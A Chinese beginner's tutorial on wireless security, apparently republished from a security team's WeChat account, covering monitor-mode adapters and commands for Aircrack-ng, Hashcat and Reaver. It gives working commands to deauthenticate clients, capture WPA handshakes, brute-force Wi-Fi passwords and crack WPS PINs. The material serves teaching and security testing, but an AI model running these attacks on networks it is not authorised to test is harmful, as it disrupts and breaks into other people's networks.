前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >小白也能玩转无线安全(一)——硬件&工具入门篇

小白也能玩转无线安全(一)——硬件&工具入门篇

作者头像
ChaMd5安全团队
发布2018-03-29 12:10:20
1.7K0
发布2018-03-29 12:10:20
举报
文章被收录于专栏:ChaMd5安全团队ChaMd5安全团队
小白也能玩转无线安全(一)——硬件&工具入门篇

From ChaMd5安全团队核心成员 sherlly

0x00 写在前面

很久之前就想出一套无线安全系列的文章,一方面,总结自己学习过程踏过的坑,另一方面,也算是和大家分享自己的学习心得,由于文章主要面向初学者,所以语言会比较浅显,文章有错误的或者是不足的地方希望大家指出,谢谢。

0x01 硬件选择

回想刚入门的时候,硬件这块不得不说是第一个坑了,网上给的建议大多参差不齐,也没有一个很好的标准,下面总结一下选择时考虑的因素:

  1. 无线网卡驱动必须支持监听模式(monitor);
  2. 选择网卡时注意功率大小,功率过小时接收包数量有限,探测范围也小,我个人用的是150Mbps;
  3. 驱动芯片要支持kali系统,而且特定的芯片对破解算法支持较好,下面整理了几款不错的芯片及对应无线网卡产品:

芯片型号

无线网卡

功率大小

价格参考(Amazon/Taobao)

Atheros AR9271

Alfa AWUS036NHA

150Mbps

$55.00/¥275+

TP-Link TL-WN722N

150Mbps

$13.71/¥100+

TP-Link TL-WN822N

300Mbps

$14.99/¥120+

Realtek RTL8187L

Alfa AWUS036H

1000MW

$34.99/¥60-200+

Ralink RT3070

Alfa AWUS036NH

2000MW

$39.99/¥160-255+

个人推荐TPLink的TL-WN722N,在旧版kali免装驱动完美识别,自带一根4dBi天线,可更换。当然,如果只是想尝尝鲜,完全可以去某宝买一个杂牌的,搜索时只搜索芯片型号就可以,如:AR9271

0x02 工具介绍

  • Aircrack-ng 套件 airmon-ng check kill //清理可能与aircrack-ng争用无线网卡的进程 airmon-ng start <interface> //无线网卡开启监听模式 airmon-ng stop <interface> //关闭无线网卡 airodump-ng <interface> //查看周围wifi热点 airodump-ng -c 6 --bssid AA:AA:AA:AA:AA:AA -w <save file> //抓取在频道6且bssid为AA:AA:AA:AA:AA:AA的路由器的握手包并保存 aireplay-ng <options> <replay interface> 常用: aireplay-ng -0 6 –a <ap mac> -c <device mac> <interface> //发送6个deauth(反认证)包强制断开目标设备的wifi连接 aircrack-ng -a2 -b AA:AA:AA:AA:AA:AA -w <dict file> <cap file> //a2表示类型为WPA的握手包,w后是爆破需要的字典文件,最后是已经捕捉到的握手包路径 aircrack-ng src.cap -J out.hccap //捕捉到的握手包.cap转换为.hccap,方便后续Hashcat破解 airbase-ng -e sherlly -c 6 <interface> //为网卡创建一个essid为'sherlly',频道为6的WiFi热点
    • airbase-ng:用于创建wifi热点
    • aircrack-ng:破解数据包密码
    • aireplay-ng:产生数据流量工具,通过多种攻击方式加速获取握手包
    • airodump-ng:查看无线网络并捕获802.11数据报文
    • airmon-ng:启动网卡的监听模式
  • Hashcat:一款支持GPU破解的密码破解神器 常用命令: hashcat64.exe -m 2500 -a3 sherllys.hccap ?d?d?d?d?d?d?d?d //破解密码为8位数字的握手包 hashcat64.exe -2 ?d?l -m 2500 -a3 sherlly.hccap ?2?2?2?2?2?2?2?2 //破解密码为8位数字加小写字母的握手包 hashcat64.exe -m 2500 sherlly.hccap pwd.txt //通过字典文件破解握手包 参数说明: 1. 暴力破解字符集选择: ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff
    • 老版本hashcat:只支持CPU破解
    • oclHashcat:支持显卡类型为AMD的GPU破解
    • cudaHashcat:支持显卡类型为NVIDIA的GPU破解
    1. 网络协议选择: 2500 = WPA/WPA2
    2. 攻击模式选择: 0 = Straight 1 = Combination 3 = Brute-force 6 = Hybrid dict + mask 7 = Hybrid mask + dict
  • Reaver:通过穷举pin码破解开启wps认证的路由 wash –i <interface> –C //探测开启wps认证的AP reaver -i <interface> -b AA:AA:AA:AA:AA:AA -vv //向bssid为AA:AA:AA:AA:AA:AA的AP发送Pin码

0x03 配置说明

1. 开启kali, 插上无线网卡,检测是否正常识别;

附:TPLINK-WN722N内置AR9271芯片,驱动型号是 ath9k_htc.

2.开启网卡监听模式,并记住设备接口名称,此处为wlan0mon:

3.开始扫描周围AP:

4.针对某一AP发起攻击:

(一)捕获802.11数据报文

(二)强制用户断开wifi重连

这一步是为了加速握手包的获得,注意需要另开终端执行,第一步的操作不要中断。

可以看到已经成功抓取握手包了。

5.关闭网卡监听模式

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-06-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 ChaMd5安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 写在前面
  • 0x01 硬件选择
  • 0x02 工具介绍
  • 0x03 配置说明
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档